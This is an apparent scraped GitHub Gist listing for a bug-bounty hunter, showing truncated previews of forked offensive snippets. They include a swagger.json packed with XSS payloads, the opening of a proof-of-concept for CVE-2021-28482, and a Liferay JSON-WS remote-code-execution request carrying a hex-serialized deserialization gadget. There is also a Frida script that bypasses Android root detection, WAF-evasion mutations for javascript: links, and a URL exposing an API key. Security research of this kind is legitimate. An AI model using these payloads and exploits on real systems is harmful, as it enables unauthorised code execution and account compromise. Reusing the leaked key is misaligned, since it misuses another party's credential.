This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
chouaib Hm chouaibhm
chouaibhm
/ concurrency.go
Created
October 2, 2021 10:48
— forked from hahwul/concurrency.go
Go concurrency
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "strconv" | |
| "sync" | |
| ) | |
| func main() { | |
| fmt.Println("vim-go") |
chouaibhm
/ swagger.json
Last active
September 23, 2021 20:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { "swagger": "2.0", "info": { "title": "/qqq'\"><b style='x: expression(alert(1))'>", "description": "/rrr'\"><b style='x: expression(alert(1))'>", "version": "2017-06-04T22:56:06+00:00", "contact": { "name": "/sss'\"></script><img src=x onerror=alert(document.domain)>", "url": "javascript:alert(document.domain)", "email": "[email protected]" } }, "host": "xok", "basePath": "/\"'>eee<img src=x onerror=alert(document.domain)>", "schemes": [ "https" ], "consumes": [ "/ttt'\"></script></select>fff<img src=x onerror=alert(document.domain)>" ], "produces": [ "/uuu'\"></script>ggg<img src=x onerror=alert(document.domain)>" ], "securityDefinitions": { "oauth2": { "flow": "implicit", "authorizationUrl": "javascript:alert(document.domain)//", "scopes": { "web-api": "testing" }, "type": "oauth2" } }, "security": [ { "tokenHeader": ["/xxx'\"><img src=x onerror=alert(document.domain)>"] } ], "paths": { "/><img src=x onerror=alert(document.domain)>": { "post": { "summary": "/'\">bbb</script><img src=x onerror=alert(document.domain)> |
chouaibhm
/ JavascriptRecon.md
Created
August 8, 2021 20:52
— forked from fuckup1337/JavascriptRecon.md
My Javascript Recon Process - BugBounty
chouaibhm
/ PoC_CVE-2021-28482.py
Created
May 5, 2021 19:53
— forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
chouaibhm
/ LiferayRce.txt
Created
May 3, 2021 05:50
— forked from Mad-robot/LiferayRce.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/jsonws/invoke HTTP/1.1 | |
| Host: <Host> | |
| Connection: close | |
| cmd2: whoami | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 4910 | |
| cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73 |
chouaibhm
/ Amass Config
Created
April 30, 2021 01:24
— forked from PatrikFehrenbach/Amass Config
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Copyright 2017-2020 Jeff Foley. All rights reserved. | |
| # Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file. | |
| # Should results only be collected passively and without DNS resolution? Not recommended. | |
| #mode = passive | |
| mode = active | |
| # The directory that stores the Cayley graph database and other output files | |
| # The default for Linux systems is: $HOME/.config/amass | |
| #output_directory = amass |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://ipgeolocation.abstractapi.com/v1/?api_key=5ff38bb958864eb7995bfe960bed76a2&ip_address=102.27.170.66 |
chouaibhm
/ CVE-2019-2725.md
Last active
November 11, 2020 10:07
— forked from pikpikcu/CVE-2019-2725.md
CVE-2019-2725 weblogic ver:10.3.6 RCE
chouaibhm
/ root_bypass.js
Created
September 27, 2020 16:53
— forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // $ frida -l antiroot.js -U -f com.example.app --no-pause | |
| // CHANGELOG by Pichaya Morimoto ([email protected]): | |
| // - I added extra whitelisted items to deal with the latest versions | |
| // of RootBeer/Cordova iRoot as of August 6, 2019 | |
| // - The original one just fucked up (kill itself) if Magisk is installed lol | |
| // Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
| // If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
| Java.perform(function() { | |
| var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
chouaibhm
/ mutation_a.txt
Created
June 18, 2020 16:33
— forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)"> | |
| [1] | |
| Bytes: | |
| \x09 \x0a \x0c \x0d \x20 \x2f | |
| <a/href="javascript:alert(1)"> | |
| <a\x09href="javascript:alert(1)"> | |
| [2,3] |
NewerOlder